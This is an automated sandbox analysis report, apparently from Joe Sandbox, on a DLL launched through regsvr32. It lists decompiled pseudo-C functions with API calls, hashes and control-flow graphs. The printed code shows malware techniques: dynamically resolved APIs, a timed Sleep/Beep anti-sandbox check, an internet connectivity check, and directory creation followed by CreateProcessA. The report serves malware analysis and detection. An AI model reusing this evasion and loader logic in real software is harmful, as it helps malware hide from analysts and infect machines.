    				_push(0x6e9fa5f0);
    				E6E9E9960(__ebx, __edi, __esi);
    				_t34 =  *0x6e9fcfec; // 0x0
    				if(_t34 > 0) {
    					 *0x6e9fcfec = _t34 - 1;
    					 *(_t82 - 0x1c) = 1;
    					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
    					 *((char*)(_t82 - 0x20)) = E6E9E8E91();
    					 *(_t82 - 4) = 1;
    					__eflags =  *0x6e9fcfc8 - 2;
    					if( *0x6e9fcfc8 != 2) {
    						E6E9E9839(_t68, 1, __esi, 7);
    						asm("int3");
    						_push(0xc);
    						_push(0x6e9fa618);
    						E6E9E9960(__ebx, 1, __esi);
    						_t72 =  *(_t82 + 0xc);
    						__eflags = _t72;
    						if(_t72 != 0) {
    							L9:
    							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
    							__eflags = _t72 - 1;
    							if(_t72 == 1) {
    								L12:
    								_t58 =  *(_t82 + 0x10);
    								_t76 = E6E9E95B8( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
    								 *(_t82 - 0x1c) = _t76;
    								__eflags = _t76;
    								if(_t76 != 0) {
    									_t41 = E6E9E92A3(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
    									_t76 = _t41;
    									 *(_t82 - 0x1c) = _t76;
    									__eflags = _t76;
    									if(_t76 != 0) {
    										goto L14;
    									}
    								}
    							} else {
    								__eflags = _t72 - 2;
    								if(_t72 == 2) {
    									goto L12;
    								} else {
    									_t58 =  *(_t82 + 0x10);
    									L14:
    									_push(_t58);
    									_push(_t72);
    									_push( *((intOrPtr*)(_t82 + 8)));
    									_t42 = E6E9E9A40();
    									_t76 = _t42;
    									 *(_t82 - 0x1c) = _t76;
    									__eflags = _t72 - 1;
    									if(_t72 == 1) {
    										__eflags = _t76;
    										if(_t76 == 0) {
    											_push(_t58);
    											_push(_t42);
    											_push( *((intOrPtr*)(_t82 + 8)));
    											_t45 = E6E9E9A40();
    											__eflags = _t58;
    											_t25 = _t58 != 0;
    											__eflags = _t25;
    											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
    											E6E9E93FD(_t58, _t68, _t72, _t76, _t25);
    											_pop(_t61);
    											E6E9E95B8( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
    										}
    									}
    									__eflags = _t72;
    									if(_t72 == 0) {
    										L19:
    										_t76 = E6E9E92A3(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
    										 *(_t82 - 0x1c) = _t76;
    										__eflags = _t76;
    										if(_t76 != 0) {
    											_t76 = E6E9E95B8( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
    											 *(_t82 - 0x1c) = _t76;
    										}
    									} else {
    										__eflags = _t72 - 3;
    										if(_t72 == 3) {
    											goto L19;
    										}
    									}
    								}
    							}
    							 *(_t82 - 4) = 0xfffffffe;
    							_t40 = _t76;
    						} else {
    							__eflags =  *0x6e9fcfec - _t72; // 0x0
    							if(__eflags > 0) {
    								goto L9;
    							} else {
    								_t40 = 0;
    							}
    						}
    						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
    						return _t40;
    					} else {
    						E6E9E8F5C(__ebx, _t61, 1, __esi);
    						E6E9E9A52();
    						E6E9E9AB3();
    						 *0x6e9fcfc8 =  *0x6e9fcfc8 & 0x00000000;
    						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
    						E6E9E9492();
    						_t54 = E6E9E90FE( *((intOrPtr*)(_t82 + 8)), 0);
    						asm("sbb esi, esi");
    						_t80 =  ~(_t54 & 0x000000ff) & 1;
    						__eflags = _t80;
    						 *(_t82 - 0x1c) = _t80;
    						 *(_t82 - 4) = 0xfffffffe;
    						E6E9E949F();
    						_t56 = _t80;
    						goto L4;
    					}
    				} else {
    					_t56 = 0;
    					L4:
    					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
    					return _t56;
    				}
    			}


















    APIs
    • __RTC_Initialize.LIBCMT ref: 6E9E9444
    • ___scrt_uninitialize_crt.LIBCMT ref: 6E9E945E
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: Initialize___scrt_uninitialize_crt
    • String ID:
    • API String ID: 2442719207-0
    • Opcode ID: 4d6da4f1d8af177ea3b73f4e339ee4b827ce6018f87e5cb3b28d19ac9abb5964
    • Instruction ID: f55bb1c7a68a81c4745f9035bd0c5f849aad8c644ee7d5be5b110934d8f437c0
    • Opcode Fuzzy Hash: 4d6da4f1d8af177ea3b73f4e339ee4b827ce6018f87e5cb3b28d19ac9abb5964
    • Instruction Fuzzy Hash: EA41D172E04665AFDB128FE9C800BDE7A7CEF95754F004899EE156BA40DB70CE418F90
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 91 6e9e94ad-6e9e94be call 6e9e9960 94 6e9e94cf-6e9e94d6 91->94 95 6e9e94c0-6e9e94c6 91->95 96 6e9e94d8-6e9e94db 94->96 97 6e9e94e2-6e9e94f6 dllmain_raw 94->97 95->94 98 6e9e94c8-6e9e94ca 95->98 96->97 99 6e9e94dd-6e9e94e0 96->99 100 6e9e959f-6e9e95a6 97->100 101 6e9e94fc-6e9e950d dllmain_crt_dispatch 97->101 102 6e9e95a8-6e9e95b7 98->102 103 6e9e9513-6e9e9525 call 6e9e9a40 99->103 100->102 101->100 101->103 106 6e9e954e-6e9e9550 103->106 107 6e9e9527-6e9e9529 103->107 109 6e9e9557-6e9e9568 dllmain_crt_dispatch 106->109 110 6e9e9552-6e9e9555 106->110 107->106 108 6e9e952b-6e9e9549 call 6e9e9a40 call 6e9e93fd dllmain_raw 107->108 108->106 109->100 111 6e9e956a-6e9e959c dllmain_raw 109->111 110->100 110->109 111->100
    C-Code - Quality: 83%
    			E6E9E94AD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				signed int _t24;
    				signed int _t25;
    				signed int _t26;
    				signed int _t29;
    				signed int _t35;
    				void* _t37;
    				void* _t40;
    				signed int _t42;
    				signed int _t45;
    				void* _t47;
    				void* _t52;
    
    				_t40 = __edx;
    				_push(0xc);
    				_push(0x6e9fa618);
    				E6E9E9960(__ebx, __edi, __esi);
    				_t42 =  *(_t47 + 0xc);
    				if(_t42 != 0) {
    					L3:
    					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
    					__eflags = _t42 - 1;
    					if(_t42 == 1) {
    						L6:
    						_t35 =  *(_t47 + 0x10);
    						_t45 = E6E9E95B8( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
    						 *(_t47 - 0x1c) = _t45;
    						__eflags = _t45;
    						if(_t45 == 0) {
    							L16:
    							 *(_t47 - 4) = 0xfffffffe;
    							_t24 = _t45;
    							L17:
    							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
    							return _t24;
    						}
    						_t25 = E6E9E92A3(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
    						_t45 = _t25;
    						 *(_t47 - 0x1c) = _t45;
    						__eflags = _t45;
    						if(_t45 == 0) {
    							goto L16;
    						}
    						L8:
    						_push(_t35);
    						_push(_t42);
    						_push( *((intOrPtr*)(_t47 + 8)));
    						_t26 = E6E9E9A40();
    						_t45 = _t26;
    						 *(_t47 - 0x1c) = _t45;
    						__eflags = _t42 - 1;
    						if(_t42 == 1) {
    							__eflags = _t45;
    							if(_t45 == 0) {
    								_push(_t35);
    								_push(_t26);
    								_push( *((intOrPtr*)(_t47 + 8)));
    								_t29 = E6E9E9A40();
    								__eflags = _t35;
    								_t14 = _t35 != 0;
    								__eflags = _t14;
    								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
    								E6E9E93FD(_t35, _t40, _t42, _t45, _t14);
    								_pop(_t37);
    								E6E9E95B8( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
    							}
    						}
    						__eflags = _t42;
    						if(_t42 == 0) {
    							L13:
    							_t45 = E6E9E92A3(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
    							 *(_t47 - 0x1c) = _t45;
    							__eflags = _t45;
    							if(_t45 != 0) {
    								_t45 = E6E9E95B8( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
    								 *(_t47 - 0x1c) = _t45;
    							}
    							goto L16;
    						} else {
    							__eflags = _t42 - 3;
    							if(_t42 != 3) {
    								goto L16;
    							}
    							goto L13;
    						}
    					}
    					__eflags = _t42 - 2;
    					if(_t42 == 2) {
    						goto L6;
    					}
    					_t35 =  *(_t47 + 0x10);
    					goto L8;
    				}
    				_t52 =  *0x6e9fcfec - _t42; // 0x0
    				if(_t52 > 0) {
    					goto L3;
    				}
    				_t24 = 0;
    				goto L17;
    			}















    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: dllmain_raw$dllmain_crt_dispatch
    • String ID:
    • API String ID: 3136044242-0
    • Opcode ID: f3bdd62b9eaf44bc6e5136fd12c9be93b17f52c126be5672da99562bac2fed98
    • Instruction ID: 01b17f800f3c0edc663631ca35febe808a74f3f7f1fe833cd5ba9e9c74a318d0
    • Opcode Fuzzy Hash: f3bdd62b9eaf44bc6e5136fd12c9be93b17f52c126be5672da99562bac2fed98
    • Instruction Fuzzy Hash: 8F219172D04625AFDB634FD9CC40AAE3A6DEF85A94F014495FE286B610DB30CD418FD0
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 73%
    			E6E9E5D90(void* __eflags) {
    				char _v5;
    				char _v6;
    				char _v7;
    				char _v8;
    				char _v9;
    				char _v10;
    				char _v11;
    				char _v12;
    				char _v13;
    				char _v14;
    				char _v15;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				CHAR* _v72;
    				intOrPtr _v76;
    				intOrPtr _v80;
    				intOrPtr _v84;
    				intOrPtr _v88;
    				CHAR* _v92;
    				intOrPtr _v96;
    				intOrPtr _v100;
    				intOrPtr _v104;
    				intOrPtr _v108;
    				intOrPtr _v112;
    				intOrPtr _v116;
    				intOrPtr _v120;
    				intOrPtr _v124;
    				intOrPtr _v128;
    				intOrPtr _v132;
    				intOrPtr _v136;
    				intOrPtr _t86;
    
    				_v5 = 0;
    				_t86 = E6E9E2640(L"KERNEL32.dll", 0); // executed
    				_v24 = _t86;
    				_v20 = E6E9E3C50(E6E9E4F10( &_v5));
    				_v28 = _v24(_v20);
    				if(_v28 == 0) {
    					_v6 = 0;
    					_v36 = E6E9E2430(L"KERNEL32.dll", 0);
    					_v32 = E6E9E3BF0(E6E9E3DF0( &_v6));
    					_v36(_v32);
    				}
    				_v7 = 0;
    				_v44 = E6E9E2640(L"KERNEL32.dll", 0);
    				_v40 = E6E9E3C90(E6E9E4120( &_v7));
    				_v48 = _v44(_v40);
    				if(_v48 == 0) {
    					_v8 = 0;
    					_v56 = E6E9E2430(L"KERNEL32.dll", 0);
    					_v52 = E6E9E3CD0(E6E9E5090( &_v8));
    					_v56(_v52);
    				}
    				_v9 = 0;
    				_v64 = E6E9E2640(L"KERNEL32.dll", 0);
    				_v60 = E6E9E3B10(E6E9E4E00( &_v9));
    				_v68 = _v64(_v60);
    				if(_v68 == 0) {
    					_v10 = 0;
    					_v76 = E6E9E2430(L"KERNEL32.dll", 0);
    					_v72 = E6E9E3B30(E6E9E43F0( &_v10));
    					LoadLibraryA(_v72);
    				}
    				_v11 = 0;
    				_v84 = E6E9E2640(L"KERNEL32.dll", 0);
    				_v80 = E6E9E3BD0(E6E9E4F90( &_v11));
    				_v88 = _v84(_v80);
    				if(_v88 == 0) {
    					_v12 = 0;
    					_v96 = E6E9E2430(L"KERNEL32.dll", 0);
    					_v92 = E6E9E3C10(E6E9E4A40( &_v12));
    					LoadLibraryA(_v92);
    				}
    				_v13 = 0;
    				_v104 = E6E9E2640(L"KERNEL32.dll", 0);
    				_v100 = E6E9E3BB0(E6E9E5010( &_v13));
    				_v108 = _v104(_v100);
    				if(_v108 == 0) {
    					_v14 = 0;
    					_v116 = E6E9E2430(L"KERNEL32.dll", 0);
    					_v112 = E6E9E3C30(E6E9E4AC0( &_v14));
    					_v116(_v112);
    				}
    				_v15 = 0;
    				_v124 = E6E9E2640(L"KERNEL32.dll", 0);
    				_v120 = E6E9E3B70(E6E9E4510( &_v15));
    				_v128 = _v124(_v120);
    				if(_v128 == 0) {
    					_v16 = 0;
    					_v136 = E6E9E2430(L"Kernel32.dll", 0);
    					_v132 = E6E9E3B90(E6E9E5200( &_v16));
    					_v136(_v132);
    				}
    				return 1;
    			}















































    APIs
    • LoadLibraryA.KERNEL32(?,KERNEL32.dll,00000000), ref: 6E9E5EBF
    • LoadLibraryA.KERNEL32(?,KERNEL32.dll,00000000), ref: 6E9E5F22
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: LibraryLoad
    • String ID: KERNEL32.dll$Kernel32.dll
    • API String ID: 1029625771-1263921953
    • Opcode ID: 4edd07bc127837bec01181b1ab28adb51a2fd32cf83698b2af3a33ecfc523779
    • Instruction ID: 8105315d30b957639c3be7d2cd2125e0437ef643159d445c93c94be8bed1942e
    • Opcode Fuzzy Hash: 4edd07bc127837bec01181b1ab28adb51a2fd32cf83698b2af3a33ecfc523779
    • Instruction Fuzzy Hash: 47711C70E00218EFCF06DBF4C8587DEBBB5AF94304F104969E606AB654EFB49A418F50
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 100%
    			E6E9E1810(CHAR* _a4, CHAR* _a8, long _a12) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _t14;
    
    				_v16 = 0x1a;
    				_v8 = E6E9E8C90("ExpandEnvironmentStringsA", 0x1a, 0x1a);
    				 *0x6e9fc9bc = E6E9E1490(_v8, "kernel32.dll", 0x1a, 0x1a);
    				_t14 =  *0x6e9fc9bc; // 0x74e04750
    				_v12 = _t14;
    				return ExpandEnvironmentStringsA(_a4, _a8, _a12);
    			}








    APIs
    • ExpandEnvironmentStringsA.KERNEL32(?,0000001A,0000001A,00000100,kernel32.dll,0000001A,0000001A,ExpandEnvironmentStringsA,0000001A,0000001A), ref: 6E9E185A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: EnvironmentExpandStrings
    • String ID: ExpandEnvironmentStringsA$PGt$kernel32.dll
    • API String ID: 237503144-2679594436
    • Opcode ID: 2395e30673c1781af88fd1928c3cdcebd7923c7507237c8b8670d879bb172f19
    • Instruction ID: 8ea49bcdb3b1cf1f87be29c1d25c4f75c85784af335faa08d5461b90e863c226
    • Opcode Fuzzy Hash: 2395e30673c1781af88fd1928c3cdcebd7923c7507237c8b8670d879bb172f19
    • Instruction Fuzzy Hash: 87F08C70A0620CFBCB10CFD4C801EDEB7B8BF9A701F00C549BA46AB380D6709A009F59
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 53%
    			E6E9E71E0() {
    				char _v5;
    				char _v6;
    				char _v7;
    				char _v8;
    				char _v9;
    				char _v10;
    				char _v11;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				CHAR* _v76;
    				intOrPtr _v80;
    				intOrPtr _v84;
    				intOrPtr _v88;
    				intOrPtr _v92;
    				intOrPtr _v96;
    				intOrPtr _v100;
    				intOrPtr _v104;
    				intOrPtr _v108;
    				intOrPtr _v112;
    				intOrPtr _v116;
    				intOrPtr _v120;
    				intOrPtr _v124;
    				intOrPtr _v128;
    				struct _PROCESS_INFORMATION _v144;
    				struct _STARTUPINFOA _v212;
    				char _v280;
    				char _v348;
    				char _v1372;
    				char _v2412;
    				char _v3452;
    				char _v4492;
    				CHAR* _t121;
    				void* _t140;
    				char* _t141;
    				CHAR* _t206;
    				intOrPtr _t207;
    				char* _t213;
    				intOrPtr _t214;
    				intOrPtr _t254;
    
    				E6E9E9250(0x1188);
    				E6E9E70A0( &_v280, 0, 0x44);
    				E6E9E70A0( &_v348, 0, 0x44);
    				E6E9E70A0( &_v212, 0, 0x44);
    				_t206 =  *0x6e9fcaf0; // 0x6e9fcb3c
    				E6E9E1810(_t206,  &_v2412, 0x410); // executed
    				_t121 =  *0x6e9fcafc; // 0x6e9fcbb0
    				E6E9E1810(_t121,  &_v3452, 0x410); // executed
    				_v20 = E6E9E26D0(L"Kernel32.dll", 0);
    				_t207 =  *0x6e9fcaec; // 0x6e9fcb50
    				_v16 = _t207;
    				_v20(_v16,  &_v4492, 0x410);
    				_v24 = E6E9E2250(0, 0);
    				_v24( &_v2412,  &_v4492);
    				_v28 = E6E9E2550(0, 0);
    				if(CreateDirectoryA( &_v2412, 0) == 0) {
    					return 0;
    				}
    				_v32 = E6E9E2250(0, 0);
    				_v32( &_v2412,  &_v3452);
    				_v5 = 0;
    				_v40 = E6E9E2250(0, 0);
    				_v36 = E6E9E3910(E6E9E41B0( &_v5));
    				_v40( &_v2412, _v36);
    				_t213 =  *0x6e9fcaf4; // 0x6e9fcbcc
    				_t140 = E6E9E8210(_t213,  &_v2412); // executed
    				if(_t140 == 0) {
    					_t141 =  *0x6e9fcb14; // 0x6e9fcc0c
    					if(E6E9E8210(_t141,  &_v2412) == 0) {
    						return 0;
    					}
    					_v92 = E6E9E24C0(0, 0);
    					_t214 =  *0x6e9fcb08; // 0x6e9fcb68
    					_v88 = _t214;
    					_v92( &_v1372, _v88);
    					_v96 = E6E9E2250(0, 0);
    					_v96( &_v1372,  &_v3452);
    					_v9 = 0;
    					_v104 = E6E9E2250(0, 0);
    					_v100 = E6E9E3A10(E6E9E4D00( &_v9));
    					_v104( &_v1372, _v100);
    					_v108 = E6E9E2250(0, 0);
    					_v108( &_v1372,  &_v2412);
    					_v10 = 0;
    					_v116 = E6E9E2250(0, 0);
    					_v112 = E6E9E38F0(E6E9E5280( &_v10));
    					_v116( &_v1372, _v112);
    					_v11 = 0;
    					_v124 = E6E9E2370(0, 0);
    					_v120 = E6E9E39D0(E6E9E3E70( &_v11));
    					_push( &_v144);
    					_push( &_v212);
    					_push(0);
    					_push(0);
    					_push(0x208);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push( &_v1372);
    					_push(_v120);
    					if(_v124() == 0) {
    						return 0;
    					}
    					_v128 = E6E9E2460(0, 0);
    					_v128(_v144.hProcess, 0x5dc);
    					E6E9E1760(_v144.hProcess);
    					E6E9E1760(_v144.hThread);
    					L12:
    					return 1;
    				}
    				_v48 = E6E9E24C0(0, 0);
    				_t254 =  *0x6e9fcb08; // 0x6e9fcb68
    				_v44 = _t254;
    				_v48( &_v1372, _v44);
    				_v52 = E6E9E2250(0, 0);
    				_v52( &_v1372,  &_v3452);
    				_v6 = 0;
    				_v60 = E6E9E2250(0, 0);
    				_v56 = E6E9E3A30(E6E9E4BC0( &_v6));
    				_v60( &_v1372, _v56);
    				_v64 = E6E9E2250(0, 0);
    				_v64( &_v1372,  &_v2412);
    				_v7 = 0;
    				_v72 = E6E9E2250(0, 0);
    				_v68 = E6E9E38D0(E6E9E4590( &_v7));
    				_v72( &_v1372, _v68);
    				_v8 = 0;
    				_v80 = E6E9E2370(0, 0);
    				_v76 = E6E9E39F0(E6E9E5120( &_v8));
    				if(CreateProcessA(_v76,  &_v1372, 0, 0, 0, 0x208, 0, 0,  &_v212,  &_v144) == 0) {
    					return 0;
    				}
    				_v84 = E6E9E2460(0, 0);
    				_v84(_v144.hProcess, 0x5dc);
    				E6E9E1760(_v144.hProcess);
    				E6E9E1760(_v144.hThread);
    				goto L12;
    			}
























































    APIs
      • Part of subcall function 6E9E1810: ExpandEnvironmentStringsA.KERNEL32(?,0000001A,0000001A,00000100,kernel32.dll,0000001A,0000001A,ExpandEnvironmentStringsA,0000001A,0000001A), ref: 6E9E185A
    • CreateDirectoryA.KERNEL32(?,00000000,00000000,00000000,?,6E9E896F), ref: 6E9E72A9
      • Part of subcall function 6E9E8210: InternetCheckConnectionA.WININET(?,00000001,00000000,00000000,00000000), ref: 6E9E8231
    • CreateProcessA.KERNEL32(?,?,00000000,00000000,00000000,00000208,00000000,00000000,?,?,00000000,00000000,?,6E9E896F), ref: 6E9E7427
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: Create$CheckConnectionDirectoryEnvironmentExpandInternetProcessStrings
    • String ID: Kernel32.dll
    • API String ID: 254214958-1926710522
    • Opcode ID: d514f6cddc1dd4e24158d131a485e11c373f314781ae6bb31c41ba0571219c64
    • Instruction ID: 30116b13f5973c308091f9373d37eb86529e84132d452ea5bc6cb3972cf13957
    • Opcode Fuzzy Hash: d514f6cddc1dd4e24158d131a485e11c373f314781ae6bb31c41ba0571219c64
    • Instruction Fuzzy Hash: 1EC11F71A40308AADB55DBF4CC45FDEB778AF98705F108999A309BB580EFB09A44CF61
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 94%
    			E6E9E8A90(void* __ecx, void* __eflags) {
    				char _v5;
    				long _v12;
    				long _v16;
    				long _v20;
    				long _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				char _v304;
    				signed char _t32;
    				char _t46;
    				char _t47;
    				char _t48;
    				intOrPtr _t49;
    				char _t50;
    
    				_v20 = 0;
    				_v16 = 0;
    				_v24 = 0;
    				_v12 = 0;
    				_v28 = 0xa;
    				_t32 = E6E9E5D90(__eflags); // executed
    				if((_t32 & 0x000000ff) == 0) {
    					L15:
    					__eflags = 0;
    					return 0;
    				} else {
    					_v5 = 0;
    					_v36 = E6E9E26D0(L"Kernel32.dll", 0);
    					_v32 = E6E9E3D10(E6E9E4E80( &_v5));
    					_v36(_v32,  &_v304, 0x100);
    					_v20 =  *((intOrPtr*)(E6E9E2220(L"Kernel32.dll", 0)))();
    					L2:
    					if(_v12 < _v28) {
    						_v40 = E6E9E22E0(L"Kernel32.dll", 0);
    						Sleep(0x1770);
    						_v44 = E6E9E2580(L"Kernel32.dll", 0);
    						Beep(0, 0xbb8);
    						_v12 = _v12 + 1;
    						goto L2;
    					}
    					_v16 =  *((intOrPtr*)(E6E9E2220(L"Kernel32.dll", 0)))();
    					_v24 = _v16 - _v20;
    					__eflags = _v24 - 0xd6d8;
    					if(_v24 < 0xd6d8) {
    						goto L15;
    					}
    					__eflags = _v12 - _v28;
    					if(__eflags < 0) {
    						goto L15;
    					}
    					_t46 = E6E9E7700(__eflags);
    					__eflags = _t46;
    					if(_t46 == 0) {
    						return 1;
    					}
    					_t47 = E6E9E69A0( &_v304); // executed
    					__eflags = _t47;
    					if(_t47 != 0) {
    						_t48 = E6E9E7670(); // executed
    						__eflags = _t48;
    						if(__eflags == 0) {
    							_t49 = E6E9E7770(); // executed
    							_v48 = _t49;
    							__eflags = _v48 - 1;
    							if(_v48 == 1) {
    								_t50 = E6E9E71E0(); // executed
    								__eflags = _t50;
    								if(__eflags == 0) {
    									E6E9E6390(__eflags);
    								} else {
    									E6E9E6390(__eflags); // executed
    								}
    							}
    						} else {
    							E6E9E6390(__eflags);
    						}
    					}
    					goto L15;
    				}
    			}

    APIs
      • Part of subcall function 6E9E5D90: LoadLibraryA.KERNEL32(?,KERNEL32.dll,00000000), ref: 6E9E5EBF
    • Sleep.KERNEL32(00001770,Kernel32.dll,00000000), ref: 6E9E8B32
    • Beep.KERNEL32(00000000,00000BB8,Kernel32.dll,00000000), ref: 6E9E8B4B
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: BeepLibraryLoadSleep
    • String ID: Kernel32.dll
    • API String ID: 1352138507-1926710522
    • Opcode ID: d44273c21361c884031f95210e4d07be0c00bf05bbab222d1f26fe49b3d78be7
    • Instruction ID: 8439258208e2c259ae3c2b9a80d3380c32cb641b0ee43e44f740df168dc1d195
    • Opcode Fuzzy Hash: d44273c21361c884031f95210e4d07be0c00bf05bbab222d1f26fe49b3d78be7
    • Instruction Fuzzy Hash: 55313070D0030AEAEB56DBF498447EEB7B8AF95304F184859D711BBA80DBB5D540CFA2
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 387 6e9e7670-6e9e76e3 call 6e9e1810 * 2 call 6e9e2250 call 6e9e25b0 PathIsDirectoryA 397 6e9e76ec 387->397 398 6e9e76e5-6e9e76ea 387->398 399 6e9e76ee-6e9e76f1 397->399 398->399
    C-Code - Quality: 79%
    			E6E9E7670() {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v268;
    				char _v524;
    				CHAR* _t12;
    				CHAR* _t21;
    
    				_t21 =  *0x6e9fcaf0; // 0x6e9fcb3c
    				E6E9E1810(_t21,  &_v268, 0x100);
    				_t12 =  *0x6e9fcaec; // 0x6e9fcb50
    				E6E9E1810(_t12,  &_v524, 0x100);
    				_v8 = E6E9E2250(L"KERNEL32.dll", 0);
    				_v8( &_v268,  &_v524);
    				_v12 = E6E9E25B0(L"Shlwapi.dll", 0);
    				if(PathIsDirectoryA( &_v268) == 0) {
    					return 0;
    				}
    				return 1;
    			}

    APIs
      • Part of subcall function 6E9E1810: ExpandEnvironmentStringsA.KERNEL32(?,0000001A,0000001A,00000100,kernel32.dll,0000001A,0000001A,ExpandEnvironmentStringsA,0000001A,0000001A), ref: 6E9E185A
    • PathIsDirectoryA.SHLWAPI(?,Shlwapi.dll,00000000), ref: 6E9E76DE
